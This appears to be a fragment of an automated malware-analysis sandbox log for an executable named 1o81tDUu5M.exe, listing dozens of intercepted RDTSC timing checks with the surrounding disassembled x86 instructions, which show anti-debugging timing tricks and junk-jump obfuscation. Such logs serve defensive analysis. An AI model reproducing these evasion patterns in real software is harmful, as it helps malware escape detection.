Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B88 second address: 6DA0BD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80147AC01h 0x00000009 add eax, 552E3C16h 0x0000000f jmp 00007FE80147AC01h 0x00000014 popfd 0x00000015 call 00007FE80147AC00h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov al, ACh 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0BD1 second address: 6DA0C2B instructions: 0x00000000 rdtsc 0x00000002 call 00007FE80149857Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 mov di, C844h 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 jmp 00007FE801498583h 0x0000001e nop 0x0000001f jmp 00007FE801498586h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FE80149857Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C65 second address: 6DA0C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C6D second address: 6DA0C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, al 0x0000000e jmp 00007FE80149857Dh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C89 second address: 6DA0CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CA6 second address: 6DA0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CAA second address: 6DA0CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CB0 second address: 6DA0CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FE86F4F6F73h 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 mov ah, 28h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov esi, 221D1323h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CE1 second address: 6DA0CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CE6 second address: 6DA0D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE80149857Ah 0x00000012 and eax, 64045A68h 0x00000018 jmp 00007FE80149857Bh 0x0000001d popfd 0x0000001e call 00007FE801498588h 0x00000023 pop eax 0x00000024 popad 0x00000025 pushad 0x00000026 call 00007FE801498581h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0D3E second address: 6DA0DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 lea eax, dword ptr [ebx+78h] 0x00000009 pushad 0x0000000a call 00007FE80147AC03h 0x0000000f movzx esi, bx 0x00000012 pop edi 0x00000013 mov dh, ch 0x00000015 popad 0x00000016 push 00000001h 0x00000018 jmp 00007FE80147ABFDh 0x0000001d nop 0x0000001e jmp 00007FE80147ABFEh 0x00000023 push eax 0x00000024 pushad 0x00000025 mov ebx, 15B3EC64h 0x0000002a mov edx, 0BF56AD0h 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 jmp 00007FE80147AC01h 0x00000037 popad 0x00000038 lea eax, dword ptr [ebp-08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE80147ABFDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DB3 second address: 6DA0DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DB9 second address: 6DA0DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DBD second address: 6DA0DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DC1 second address: 6DA0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE80147AC01h 0x00000012 jmp 00007FE80147ABFBh 0x00000017 popfd 0x00000018 mov ah, 93h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DEE second address: 6DA0E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498581h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E03 second address: 6DA0E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E32 second address: 6DA0E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E36 second address: 6DA0E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E3A second address: 6DA0E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E40 second address: 6DA0EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE80147AC08h 0x00000008 pop ecx 0x00000009 call 00007FE80147ABFBh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov edi, eax 0x00000014 jmp 00007FE80147ABFFh 0x00000019 test edi, edi 0x0000001b jmp 00007FE80147AC06h 0x00000020 js 00007FE86F4D941Bh 0x00000026 jmp 00007FE80147AC00h 0x0000002b mov eax, dword ptr [ebp-04h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FE80147AC07h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0EC6 second address: 6DA0EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FE801498580h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE801498583h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0EFA second address: 6DA0F17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F17 second address: 6DA0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F1D second address: 6DA0F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f mov di, si 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx esi, dx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F42 second address: 6DA0FE8 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push 00000001h 0x0000000a jmp 00007FE801498585h 0x0000000f nop 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 pushfd 0x00000015 jmp 00007FE801498588h 0x0000001a sub ecx, 5687D2C8h 0x00000020 jmp 00007FE80149857Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FE801498589h 0x0000002d nop 0x0000002e jmp 00007FE80149857Eh 0x00000033 lea eax, dword ptr [ebp-18h] 0x00000036 jmp 00007FE801498580h 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FE801498587h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0FE8 second address: 6DA1000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1000 second address: 6DA1028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, 8AE1h 0x00000013 jmp 00007FE80149857Eh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1105 second address: 6DA110B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA110B second address: 6DA1169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 jmp 00007FE801498582h 0x00000015 popad 0x00000016 lock cmpxchg dword ptr [edx], ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ecx, edx 0x0000001f pushfd 0x00000020 jmp 00007FE801498589h 0x00000025 or si, 21B6h 0x0000002a jmp 00007FE801498581h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1169 second address: 6DA116F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA116F second address: 6DA1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1173 second address: 6DA11C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 test eax, eax 0x00000016 jmp 00007FE80147AC03h 0x0000001b jne 00007FE86F4D9128h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE80147AC05h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA11C7 second address: 6DA11EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80149857Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA11EE second address: 6DA1224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f push esi 0x00000010 jmp 00007FE80147ABFFh 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [edx], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1224 second address: 6DA122A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA122A second address: 6DA124F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147AC06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA124F second address: 6DA1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1253 second address: 6DA1259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1259 second address: 6DA126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA126A second address: 6DA12C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov edi, 0B15DC8Eh 0x00000015 pop ebx 0x00000016 mov si, 14CBh 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FE80147ABFAh 0x00000026 sbb eax, 2D68C7D8h 0x0000002c jmp 00007FE80147ABFBh 0x00000031 popfd 0x00000032 mov cx, DE8Fh 0x00000036 popad 0x00000037 movzx ecx, dx 0x0000003a popad 0x0000003b mov dword ptr [edx+08h], eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA12C2 second address: 6DA13E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE801498582h 0x0000000e popad 0x0000000f mov eax, dword ptr [esi+0Ch] 0x00000012 jmp 00007FE801498580h 0x00000017 mov dword ptr [edx+0Ch], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FE80149857Eh 0x00000021 xor si, B6F8h 0x00000026 jmp 00007FE80149857Bh 0x0000002b popfd 0x0000002c jmp 00007FE801498588h 0x00000031 popad 0x00000032 mov eax, dword ptr [esi+10h] 0x00000035 jmp 00007FE801498580h 0x0000003a mov dword ptr [edx+10h], eax 0x0000003d jmp 00007FE801498580h 0x00000042 mov eax, dword ptr [esi+14h] 0x00000045 jmp 00007FE801498580h 0x0000004a mov dword ptr [edx+14h], eax 0x0000004d pushad 0x0000004e push esi 0x0000004f pushfd 0x00000050 jmp 00007FE80149857Dh 0x00000055 sbb esi, 00B65656h 0x0000005b jmp 00007FE801498581h 0x00000060 popfd 0x00000061 pop ecx 0x00000062 pushad 0x00000063 jmp 00007FE801498587h 0x00000068 mov ecx, 2416ABAFh 0x0000006d popad 0x0000006e popad 0x0000006f mov eax, dword ptr [esi+18h] 0x00000072 jmp 00007FE801498582h 0x00000077 mov dword ptr [edx+18h], eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA13E0 second address: 6DA1477 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, ebx 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE80147ABFDh 0x00000015 xor eax, 53CF0A76h 0x0000001b jmp 00007FE80147AC01h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FE80147AC00h 0x00000027 add ecx, 70C69F98h 0x0000002d jmp 00007FE80147ABFBh 0x00000032 popfd 0x00000033 popad 0x00000034 push esi 0x00000035 push edi 0x00000036 pop esi 0x00000037 pop edi 0x00000038 popad 0x00000039 mov dword ptr [edx+1Ch], eax 0x0000003c jmp 00007FE80147ABFEh 0x00000041 mov eax, dword ptr [esi+20h] 0x00000044 pushad 0x00000045 mov di, si 0x00000048 mov ch, 77h 0x0000004a popad 0x0000004b mov dword ptr [edx+20h], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FE80147AC07h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1477 second address: 6DA147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA147D second address: 6DA14E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FE80147AC00h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, 5A00h 0x0000001b pushfd 0x0000001c jmp 00007FE80147AC09h 0x00000021 sub ecx, 4D380C06h 0x00000027 jmp 00007FE80147AC01h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14E5 second address: 6DA14EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14EB second address: 6DA14EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14EF second address: 6DA14F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14F3 second address: 6DA1509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, 6C6190A7h 0x00000013 push eax 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1509 second address: 6DA1559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80149857Fh 0x00000009 xor ah, FFFFFFEEh 0x0000000c jmp 00007FE801498589h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+28h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE801498584h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1559 second address: 6DA1568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1568 second address: 6DA160F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push edi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE801498583h 0x00000015 or cx, C80Eh 0x0000001a jmp 00007FE801498589h 0x0000001f popfd 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 mov dword ptr [edx+2Ch], ecx 0x00000027 pushad 0x00000028 mov esi, 5915E40Fh 0x0000002d call 00007FE801498584h 0x00000032 pushfd 0x00000033 jmp 00007FE801498582h 0x00000038 xor eax, 2CA688E8h 0x0000003e jmp 00007FE80149857Bh 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 mov ax, word ptr [esi+30h] 0x0000004a jmp 00007FE80149857Fh 0x0000004f mov word ptr [edx+30h], ax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA160F second address: 6DA1613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1613 second address: 6DA1619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1619 second address: 6DA1636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1636 second address: 6DA167D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c jmp 00007FE80149857Dh 0x00000011 mov word ptr [edx+32h], ax 0x00000015 jmp 00007FE80149857Eh 0x0000001a mov eax, dword ptr [esi+34h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE801498587h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA167D second address: 6DA16AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80147ABFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16AC second address: 6DA16B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16B2 second address: 6DA16B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16B6 second address: 6DA1733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov bl, EFh 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 jne 00007FE86F4F65C3h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FE801498586h 0x00000021 sub ecx, 47ECCA58h 0x00000027 jmp 00007FE80149857Bh 0x0000002c popfd 0x0000002d mov si, B30Fh 0x00000031 popad 0x00000032 or dword ptr [edx+38h], FFFFFFFFh 0x00000036 jmp 00007FE801498582h 0x0000003b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003f jmp 00007FE801498580h 0x00000044 or dword ptr [edx+40h], FFFFFFFFh 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1733 second address: 6DA1737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1737 second address: 6DA173D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA173D second address: 6DA1743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1743 second address: 6DA1747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1747 second address: 6DA176B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE80147AC09h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA176B second address: 6DA1771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
